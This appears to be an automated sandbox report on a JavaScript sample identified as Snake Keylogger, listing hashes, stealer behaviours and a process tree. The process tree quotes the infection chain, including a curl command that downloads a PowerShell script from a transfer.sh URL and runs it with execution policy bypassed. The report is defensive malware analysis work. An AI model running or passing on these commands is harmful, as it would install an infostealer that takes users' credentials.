Analysis
-
max time kernel
64s -
max time network
129s -
platform
windows10-2004_x64 -
resource
win10v2004-20220901-en -
resource tags
arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system -
submitted
25-11-2022 18:01
Static task
static1
Behavioral task
behavioral1
Sample
File.js
Resource
win7-20220901-en
Behavioral task
behavioral2
Sample
File.js
Resource
win10v2004-20220901-en
General
-
Target
File.js
-
Size
1024KB
-
MD5
e6ec998371e8e87c4fd54fab0753efd6
-
SHA1
78ffb07d87bdc791efdf6621df9a69552dc12a84
-
SHA256
416293a2a049e175d85d418790035732eda8a055071d82d10f36a5bf6d9f246f
-
SHA512
1beb3ac230a17cf5a383660447368744d8ce183edbf5eba27d6b466031cdde96025ea32ad14d8ae6be3f0535a6537e41d3b4ff09fadd6f27aca14e8b94f79bbf
-
SSDEEP
24576:NFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFo:
Malware Config
Signatures
-
Snake Keylogger
Keylogger and Infostealer first seen in November 2020.
-
Snake Keylogger payload 2 IoCs
Processes:
resource yara_rule behavioral2/memory/4476-146-0x0000000000400000-0x0000000000426000-memory.dmp family_snakekeylogger behavioral2/memory/4476-147-0x000000000042077E-mapping.dmp family_snakekeylogger -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
wscript.exewscript.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation wscript.exe Key value queried \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation wscript.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
Processes:
RegAsm.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegAsm.exe Key opened \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegAsm.exe Key opened \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegAsm.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 22 checkip.dyndns.org -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid process target process PID 4280 set thread context of 4476 4280 powershell.exe RegAsm.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
powershell.exeRegAsm.exepid process 4280 powershell.exe 4280 powershell.exe 4476 RegAsm.exe 4476 RegAsm.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exeRegAsm.exedescription pid process Token: SeDebugPrivilege 4280 powershell.exe Token: SeDebugPrivilege 4476 RegAsm.exe -
Suspicious use of WriteProcessMemory 22 IoCs
Processes:
wscript.exewscript.execmd.execmd.execmd.execmd.exepowershell.exedescription pid process target process PID 4960 wrote to memory of 2168 4960 wscript.exe wscript.exe PID 4960 wrote to memory of 2168 4960 wscript.exe wscript.exe PID 2168 wrote to memory of 2100 2168 wscript.exe cmd.exe PID 2168 wrote to memory of 2100 2168 wscript.exe cmd.exe PID 2100 wrote to memory of 5036 2100 cmd.exe cmd.exe PID 2100 wrote to memory of 5036 2100 cmd.exe cmd.exe PID 5036 wrote to memory of 2260 5036 cmd.exe curl.exe PID 5036 wrote to memory of 2260 5036 cmd.exe curl.exe PID 2168 wrote to memory of 4352 2168 wscript.exe cmd.exe PID 2168 wrote to memory of 4352 2168 wscript.exe cmd.exe PID 4352 wrote to memory of 4032 4352 cmd.exe cmd.exe PID 4352 wrote to memory of 4032 4352 cmd.exe cmd.exe PID 4032 wrote to memory of 4280 4032 cmd.exe powershell.exe PID 4032 wrote to memory of 4280 4032 cmd.exe powershell.exe PID 4280 wrote to memory of 4476 4280 powershell.exe RegAsm.exe PID 4280 wrote to memory of 4476 4280 powershell.exe RegAsm.exe PID 4280 wrote to memory of 4476 4280 powershell.exe RegAsm.exe PID 4280 wrote to memory of 4476 4280 powershell.exe RegAsm.exe PID 4280 wrote to memory of 4476 4280 powershell.exe RegAsm.exe PID 4280 wrote to memory of 4476 4280 powershell.exe RegAsm.exe PID 4280 wrote to memory of 4476 4280 powershell.exe RegAsm.exe PID 4280 wrote to memory of 4476 4280 powershell.exe RegAsm.exe -
outlook_office_path 1 IoCs
Processes:
RegAsm.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegAsm.exe -
outlook_win_path 1 IoCs
Processes:
RegAsm.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegAsm.exe
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\File.js1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4960 -
C:\Windows\System32\wscript.exe"C:\Windows\System32\wscript.exe" "C:\Users\Admin\AppData\Local\Temp\GTA01.vbs"2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2168 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c cmd.exe /c curl https://transfer.sh/get/KUz0uB/GTA.ps1 --output C:\Users\Admin\AppData\Roaming\rr.ps13⤵
- Suspicious use of WriteProcessMemory
PID:2100 -
C:\Windows\system32\cmd.execmd.exe /c curl https://transfer.sh/get/KUz0uB/GTA.ps1 --output C:\Users\Admin\AppData\Roaming\rr.ps14⤵
- Suspicious use of WriteProcessMemory
PID:5036 -
C:\Windows\system32\curl.execurl https://transfer.sh/get/KUz0uB/GTA.ps1 --output C:\Users\Admin\AppData\Roaming\rr.ps15⤵PID:2260
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c cmd.exe /c powershell.exe -exec Bypass -C C:\Users\Admin\AppData\Roaming\rr.ps13⤵
- Suspicious use of WriteProcessMemory
PID:4352 -
C:\Windows\system32\cmd.execmd.exe /c powershell.exe -exec Bypass -C C:\Users\Admin\AppData\Roaming\rr.ps14⤵
- Suspicious use of WriteProcessMemory
PID:4032 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -exec Bypass -C C:\Users\Admin\AppData\Roaming\rr.ps15⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4280 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"6⤵
- Accesses Microsoft Outlook profiles
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:4476
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
111KB
MD5ae6f5f99b79da73f4a5946b99638464c
SHA15dabcaf16267d88916091c8b969fab45e2780a2f
SHA256839956f6240fdb2afed0556347dd1ecd8c375cbf5e8c017073bc87383e41a77d
SHA512139210450bc7b580acb20a3f205ed15bb70ebc8779efbd5db31e8d77f8e37b396606d60ae87a8b8cce63e2a41666e54cec95d9a00f1959b96fa9047cb8624a8b
-
Filesize
3.4MB
MD5a908a60eb1d2e84d13e9a557d622fa53
SHA1a50946a87bbc482bbbef76b37e26e15eaedc6c57
SHA2562d3c5571d27220d4bbc9547598eae6a8b843eaa31799f128428e155e94807341
SHA512a5c411a82e0c46c58cacc3d3bcaf168d80e9188245f6fbdad50493a2e071c1d8301ecca4fa40df752e7f1548d138e3c7c4cc46ca66593bec584313de3c24e5d0